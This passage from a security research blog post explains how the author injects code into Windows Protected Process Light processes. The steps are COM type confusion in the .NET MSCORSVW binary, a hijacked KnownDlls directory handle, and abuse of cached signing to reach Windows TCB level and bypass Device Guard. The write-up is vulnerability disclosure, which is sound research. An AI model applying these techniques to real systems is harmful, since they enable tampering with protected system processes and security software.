                    Path=$path;
                    Type=$prot.Type;
                    Signer=$prot.Signer;
                    Level=$prot.Level.ToString("X");
                }
                $obj = New-Object -TypeName PSObject -Prop $props
                Write-Output $obj
            }
        } catch {
        }
    }
}
When this script is executed a function is defined, Test-ProtectedProcess. The function takes a path to an executable, starts that executable with a specified protection level and checks whether it was successful. If the ProtectedType and ProtectedSigner parameters are 0 then the kernel decides the “best” process level. This leads to some annoying quirks: for example SVCHOST.EXE is explicitly marked as PPL and will run at PPL-Windows level, however as it’s also a signed OS component the kernel will determine its maximum level is PP-Authenticode. Another interesting quirk is that using the native process creation APIs it’s possible to start a DLL as the main executable image. As a significant number of system DLLs have embedded Microsoft signatures they can also be started as PP-Authenticode, even though this isn’t necessarily that useful. The list of binaries that will run at PPL is shown below along with their maximum signing level.
Path                                                          Signing Level
C:\windows\Microsoft.Net\Framework\v4.0.30319\mscorsvw.exe    CodeGen
C:\windows\Microsoft.Net\Framework64\v4.0.30319\mscorsvw.exe  CodeGen
C:\windows\system32\SecurityHealthService.exe                 Windows
C:\windows\system32\svchost.exe                               Windows
C:\windows\system32\xbgmsvc.exe                               Windows
C:\windows\system32\csrss.exe                                 Windows TCB
C:\windows\system32\services.exe                              Windows TCB
C:\windows\system32\smss.exe                                  Windows TCB
C:\windows\system32\werfaultsecure.exe                        Windows TCB
C:\windows\system32\wininit.exe                               Windows TCB

Injecting Arbitrary Code Into NGEN

After carefully reviewing the list of executables which run as PPL I settled on trying to attack the previously mentioned .NET NGEN binary, MSCORSVW.EXE. My rationale for choosing the NGEN binary was:
  • Most of the other binaries are service binaries which might need administrator privileges to start correctly.
  • The binary is likely to be loading complex functionality such as the .NET framework as well as having multiple COM interactions (my go-to technology for weird behavior).
  • In the worst case it might still yield a Device Guard bypass as the reason it runs as PPL is to give it access to the kernel APIs to apply a cached signing level. Any bug in the operation of this binary might be exploitable even if we can’t get arbitrary code running in a PPL.

But there is an issue with the NGEN binary: specifically, it doesn’t meet my own criterion of getting the top signing level, Windows TCB. However, I knew that when Microsoft fixed Issue 1332 they left in a back door where a writable handle could be maintained during the signing process if the calling process is PPL, as shown below:
NTSTATUS CiSetFileCache(HANDLE Handle, ...) {

 ObReferenceObjectByHandle(Handle, &FileObject);

 if (FileObject->SharedWrite ||
    (FileObject->WriteAccess &&
     PsGetProcessProtection().Type != PROTECTED_LIGHT)) {

 // Continue setting file cache.
If I could get code execution inside the NGEN binary I could reuse this backdoor to cache sign an arbitrary file which will load into any PPL. I could then DLL hijack a full PPL-WindowsTCB process to reach my goal.
To begin the investigation we need to determine how to use the MSCORSVW executable. Using MSCORSVW is not documented anywhere by Microsoft, so we’ll have to do a bit of digging. First off, this binary is not supposed to be run directly; instead it’s invoked by NGEN when creating an NGEN’ed binary. Therefore, we can run the NGEN binary and use a tool such as Process Monitor to capture what command line is being used for the MSCORSVW process. Executing the command:
C:\> NGEN install c:\some\binary.dll
Results in the following command line being executed:
MSCORSVW -StartupEvent A -InterruptEvent B -NGENProcess C -Pipe D
A, B, C and D are handles which NGEN ensures are inherited into the new process before it starts. As we don’t see any of the original NGEN command line parameters it seems likely they’re being passed over an IPC mechanism. The “Pipe” parameter gives an indication that  named pipes are used for IPC. Digging into the code in MSCORSVW, we find the method NGenWorkerEmbedding, which looks like the following:
void NGenWorkerEmbedding(HANDLE hPipe) {
 CorSvcBindToWorkerClassFactory factory;

 // Marshal class factory.
 IStream* pStm;
 CreateStreamOnHGlobal(nullptr, TRUE, &pStm);
 CoMarshalInterface(pStm, &IID_IClassFactory, &factory,
                    MSHCTX_LOCAL, nullptr, MSHLFLAGS_NORMAL);

 // Read marshaled object and write to pipe.
 DWORD length;
 char* buffer = ReadEntireIStream(pStm, &length);
 WriteFile(hPipe, &length, sizeof(length));
 WriteFile(hPipe, buffer, length);

 // Set event to synchronize with parent.

 // Pump message loop to handle COM calls.

 // ...
This code is not quite what I expected. Rather than using the named pipe for the entire communication channel, it’s only used to transfer a marshaled COM object back to the calling process. The COM object is a class factory instance. Normally you’d register the factory using CoRegisterClassObject, but that would make it accessible to all processes at the same security level; by using marshaling instead, the connection can be kept private to the NGEN binary which spawned MSCORSVW. A .NET-related process using COM gets me interested, as I’ve previously described in another blog post how you can exploit COM objects implemented in .NET. If we’re lucky this COM object is implemented in .NET; we can determine whether it is by querying for its interfaces, for example using the Get-ComInterface command in my OleViewDotNet PowerShell module as shown in the following screenshot.

We’re out of luck, this object is not implemented in .NET, as you’d at least expect to see an instance of the _Object interface. There’s only one interface implemented, ICorSvcBindToWorker so let’s dig into that interface to see if there’s anything we can exploit.
Something caught my eye: in the screenshot there’s a HasTypeLib column, and for ICorSvcBindToWorker we see that the column is set to True. What HasTypeLib indicates is that rather than the interface’s proxy code being implemented using a predefined NDR byte stream, it’s generated on the fly from a type library. I’ve abused this auto-generating proxy mechanism before to elevate to SYSTEM, reported as issue 1112. In the issue I used some interesting behavior of the system’s Running Object Table (ROT) to force a type confusion in a system COM service. While Microsoft has fixed the issue for User to SYSTEM there’s nothing stopping us using the type confusion trick to exploit the MSCORSVW process running as PPL at the same privilege level and get arbitrary code execution. Another advantage of using a type library is that a normal proxy would be loaded as a DLL, which means that it must meet the PPL signing level requirements; however a type library is just data so can be loaded into a PPL without any signing level violations.
How does the type confusion work? Looking at the ICorSvcBindToWorker interface from the type library:
interface ICorSvcBindToWorker : IUnknown {
   HRESULT BindToRuntimeWorker(
             [in] BSTR pRuntimeVersion,
             [in] unsigned long ParentProcessID,
             [in] BSTR pInterruptEventName,
             [in] ICorSvcLogger* pCorSvcLogger,
             [out] ICorSvcWorker** pCorSvcWorker);
};
The single method, BindToRuntimeWorker, takes five parameters: four inbound and one outbound. When trying to access the method over DCOM from our untrusted process, the system will automatically generate the proxy and stub for the call. This includes marshaling COM interface parameters into a buffer, sending the buffer to the remote process, and then unmarshaling it back to a pointer before calling the real function. For example, imagine a simpler function, DoSomething, which takes a single IUnknown pointer. The marshaling process looks like the following:
The operation of the method call is as follows:
  1. The untrusted process calls DoSomething on the interface, which is actually a pointer to DoSomethingProxy (auto-generated from the type library), passing an IUnknown pointer parameter.
  2. DoSomethingProxy marshals the IUnknown pointer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the interface pointer from the buffer. Note that this pointer is not the original pointer from step 1, it’s likely to be a new proxy which calls back to the untrusted process.
  4. The stub invokes the real implemented method inside the server, passing the unmarshaled interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable.

How would we exploit this? All we need to do is modify the type library so that instead of passing an interface pointer we pass almost anything else. While the type library file is in a system location which we can't modify, we can just replace the registration for it in the current user's registry hive, or use the same ROT trick from issue 1112. For example, if we modify the type library to pass an integer instead of an interface pointer we get the following:
The operation of the marshal now changes as follows:
  1. The untrusted process calls DoSomething on the interface, which is actually a pointer to DoSomethingProxy (auto-generated from the type library), passing an arbitrary integer parameter.
  2. DoSomethingProxy marshals the integer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the integer from the buffer.
  4. The stub invokes the real implemented method inside the server, passing the integer as the parameter. However, DoSomething hasn't changed; it's still the same method which accepts an interface pointer. As the COM runtime has no more type information at this point, the integer is type confused with the interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable. As this pointer is completely under control of the untrusted process this likely results in arbitrary code execution.

By changing the type of parameter from an interface pointer to an integer we induce a type confusion which allows us to get an arbitrary pointer dereferenced, resulting in arbitrary code execution. We could even simplify the attack by adding to the type library the following structure:
struct FakeObject {
   BSTR FakeVTable;
};
If we pass a pointer to a FakeObject instead of the interface pointer, the auto-generated proxy will marshal the structure and its BSTR, recreating it on the other side in the stub. As a BSTR is a counted string it can contain NULLs, so this will create a pointer to an object which contains a pointer to an arbitrary byte array that can act as a VTable. Place known function pointers in that BSTR and you can easily redirect execution without having to guess the location of a suitable VTable buffer.
To fully exploit this we'd need to call a suitable method, probably running a ROP chain, and we might also have to bypass CFG. That all sounds like too much hard work, so instead I'll take a different approach to get arbitrary code running in the PPL binary: abusing KnownDlls.

KnownDlls and Protected Processes

In my previous blog post I described a technique to elevate privileges from an arbitrary object directory creation vulnerability to SYSTEM by adding an entry into the KnownDlls directory and getting an arbitrary DLL loaded into a privileged process. I noted that this was also an administrator-to-PPL code injection, as a PPL will also load DLLs from the system's KnownDlls location. Because the code signing check is performed during section creation, not section mapping, as long as you can place an entry into KnownDlls you can load anything into a PPL, even unsigned code.
This doesn't immediately seem that useful: we can't write to KnownDlls without being an administrator, and even then not without some clever tricks. However, it's worth looking at how a Known DLL is loaded to understand how it can be abused. Inside NTDLL's loader (LDR) code is the following function to determine if there's a preexisting Known DLL:
NTSTATUS LdrpFindKnownDll(PUNICODE_STRING DllName, HANDLE *SectionHandle) {
  // If KnownDll directory handle not open then return error.
  if (!LdrpKnownDllDirectoryHandle)
    return STATUS_DLL_NOT_FOUND;

  OBJECT_ATTRIBUTES ObjectAttributes;
  InitializeObjectAttributes(&ObjectAttributes, DllName,
                             OBJ_CASE_INSENSITIVE,
                             LdrpKnownDllDirectoryHandle, nullptr);

  return NtOpenSection(SectionHandle,
                       SECTION_MAP_READ | SECTION_MAP_EXECUTE,
                       &ObjectAttributes);
}
The LdrpFindKnownDll function calls NtOpenSection to open the named section object for the Known DLL. It doesn't open an absolute path; instead it uses a feature of the native system calls to specify a root directory for the object name lookup in the OBJECT_ATTRIBUTES structure. This root directory comes from the global variable LdrpKnownDllDirectoryHandle. Implementing the call this way allows the loader to specify only the filename (e.g. EXAMPLE.DLL) and not have to reconstruct the absolute path, as the lookup will be relative to an existing directory. Chasing references to LdrpKnownDllDirectoryHandle, we find it's initialized in LdrpInitializeProcess as follows:
NTSTATUS LdrpInitializeProcess() {
  // ...
  PPEB peb = // ...
  // If a full protected process don't use KnownDlls.
  if (peb->IsProtectedProcess && !peb->IsProtectedProcessLight) {
    LdrpKnownDllDirectoryHandle = nullptr;
  } else {
    OBJECT_ATTRIBUTES ObjectAttributes;
    UNICODE_STRING DirName;
    RtlInitUnicodeString(&DirName, L"\\KnownDlls");
    InitializeObjectAttributes(&ObjectAttributes, &DirName,
                               OBJ_CASE_INSENSITIVE,
                               nullptr, nullptr);
    // Open KnownDlls directory.
    NtOpenDirectoryObject(&LdrpKnownDllDirectoryHandle,
                          DIRECTORY_QUERY | DIRECTORY_TRAVERSE,
                          &ObjectAttributes);
  }
  // ...
}
This code shouldn't be that unexpected: the implementation calls NtOpenDirectoryObject, passing the absolute path to the KnownDlls directory as the object name. The opened handle is stored in the LdrpKnownDllDirectoryHandle global variable for later use. It's worth noting that this code checks the PEB to determine whether the current process is a full protected process. Support for loading Known DLLs is disabled in full protected process mode, which is why even with administrator privileges and the clever trick I outlined in the last blog post we could only compromise PPL, not PP.
How does this knowledge help us? We can use our COM type confusion trick to write values into arbitrary memory locations instead of trying to hijack code execution, resulting in a data-only attack. As we can inherit any handles we like into the new PPL process, we can set up an object directory with a named section, then use the type confusion to change the value of LdrpKnownDllDirectoryHandle to the value of the inherited handle. If we induce a DLL load from System32 with a known name, the LDR will check our fake directory for the named section and map our unsigned code into memory, even calling DllMain for us. No need for injecting threads, ROP, or bypassing CFG.
All we need is a suitable primitive to write an arbitrary value. Unfortunately, while I could find methods which would cause an arbitrary write, I couldn't sufficiently control the value being written. In the end I used the following interface and method, which is implemented on the object returned by ICorSvcBindToWorker::BindToRuntimeWorker:
interface ICorSvcPooledWorker : IUnknown {
   HRESULT CanReuseProcess(
           [in] OptimizationScenario scenario,
           [in] ICorSvcLogger* pCorSvcLogger,
            [out] long* pCanContinue);
};
In the implementation of CanReuseProcess, the target value of pCanContinue is always initialized to 0. Therefore, by replacing the [out] long* in the type library definition with [in] long, we can get 0 written to any memory location we specify. By prefilling the lower 16 bits of the new process' handle table with handles to a fake KnownDlls directory, we can be sure of an alias between the real KnownDlls handle, which will be opened once the process starts, and one of our fake ones, just by setting the top 16 bits of the handle to 0. This is shown in the following diagram:

Once we've overwritten the top 16 bits with 0 (the write is 32 bits but handles are 64 bits in 64-bit mode, so we won't overwrite anything important), LdrpKnownDllDirectoryHandle now points to one of our fake KnownDlls handles. We can then easily induce a DLL load by sending a custom marshaled object to the same method, and we'll get arbitrary code execution inside the PPL.

Elevating to PPL-Windows TCB

We can't stop here: attacking MSCORSVW only gets us PPL at the CodeGen signing level, not Windows TCB. Knowing that a fake cached signed DLL should run in a PPL, and that Microsoft left a backdoor for PPL processes at any signing level, I converted my C# code from issue 1332 to C++ to generate a fake cached signed DLL. By abusing a DLL hijack in WERFAULTSECURE.EXE, which will run as PPL Windows TCB, we should get code execution at the desired signing level. This worked on Windows 10 1709 and earlier; however, it didn't work on 1803. Clearly Microsoft had changed the behavior of cached signing levels in some way, perhaps removing their trust in PPL entirely. That seemed unlikely, as it would have a negative performance impact.
After discussing this a bit with Alex Ionescu, I put together a quick parser, using information from Alex, for the cached signing data on a file. This is exposed in NtObjectManager as the Get-NtCachedSigningLevel command. I ran this command against a fake signed binary and a system binary which was also cached signed, and immediately noticed a difference:

For the fake signed file the Flags are set to TrustedSignature (0x02); for the system binary, however, PowerShell couldn't decode the enumeration and so just output the integer value 66, which is 0x42 in hex. The value 0x40 is an extra flag on top of the original trusted signature flag. It seemed likely that without this flag set the DLL wouldn't be loaded into a PPL process. Something must be setting this flag, so I decided to check what happened if I loaded a valid cached signed DLL without the extra flag into a PPL process. Monitoring it in Process Monitor I got my answer:

The Process Monitor trace shows that the kernel first queries the Extended Attributes (EA) of the DLL. The cached signing level data is stored in the file's EA, so this is almost certainly an indication of the cached signing level being read. The full trace also shows artifacts of checking the full signature, such as enumerating catalog files; I've removed those from the screenshot for brevity. Finally the EA is set, and if I check the cached signing level of the file it now includes the extra flag. So setting the cached signing level is done automatically; the question is how. By pulling up the stack trace we can see how it happens:

Looking at the middle of the stack trace, we can see the call to CipSetFileCache originates from the call to NtCreateSection. The kernel is automatically caching the signature when it makes sense to do so, e.g. in a PPL, so that subsequent image mappings don't need to recheck the signature. It's possible to map an image section from a file with write access, so we can reuse the same attack from issue 1332, replace the call to NtSetCachedSigningLevel with NtCreateSection, and fake sign any DLL. It turned out that the call to set the file cache happened after the write check introduced to fix issue 1332, so it was possible to use this to bypass Device Guard again. For that reason I reported the bypass as issue 1597, which was fixed in September 2018 as CVE-2018-8449. However, as with issue 1332, the backdoor for PPL is still in place, so even though the fix eliminated the Device Guard bypass it can still be used to get us from PPL-CodeGen to PPL-WindowsTCB.

Conclusions

This blog showed how I was able to inject arbitrary code into a PPL without requiring administrator privileges. What could you do with this newfound power? As a normal user, actually not a great deal, but there are some parts of the OS, such as the Windows Store, which rely on PPL to secure files and resources you can't modify as a normal user. If you elevate to administrator and then inject into a PPL, you get many more things to attack, such as CSRSS (through which you can certainly get kernel code execution) or Windows Defender, which runs as PPL Anti-Malware. Over time I'm sure the majority of the use cases for PPL will be replaced with Virtual Secure Mode (VSM) and Isolated User Mode (IUM) applications, which have greater security guarantees and are also considered security boundaries that Microsoft will defend and fix.
Did I report these issues to Microsoft? Microsoft has made it clear that they will not fix issues affecting only PP and PPL in a security bulletin. Without a security bulletin the researcher receives no acknowledgement for the find, such as a CVE, and the issue will not be fixed in current versions of Windows, although it might be fixed in the next major version. Previously, confirming Microsoft's policy on fixing a particular security issue was a matter of precedent; however, they've recently published a list of Windows technologies that will or will not be fixed in the Windows Security Service Criteria. As shown below for Protected Process Light, Microsoft will not fix or pay a bounty for issues relating to the feature. Therefore, from now on I will not be engaging Microsoft if I discover issues which I believe only affect PP or PPL.

The one bug I reported to Microsoft was fixed only because it could be used to bypass Device Guard. When you think about it, fixing only for Device Guard is somewhat odd: I can still bypass Device Guard by injecting into a PPL and setting a cached signing level, and yet Microsoft won't fix PPL issues but will fix Device Guard issues. Much as the Windows Security Service Criteria document helps clarify what Microsoft will and won't fix, it's still somewhat arbitrary. A feature is rarely secure in isolation; it is almost certainly secure because other features enable it to be so.
In part 2 of this blog we’ll go into how I was also able to break into Full PP-WindowsTCB processes using another interesting feature of COM.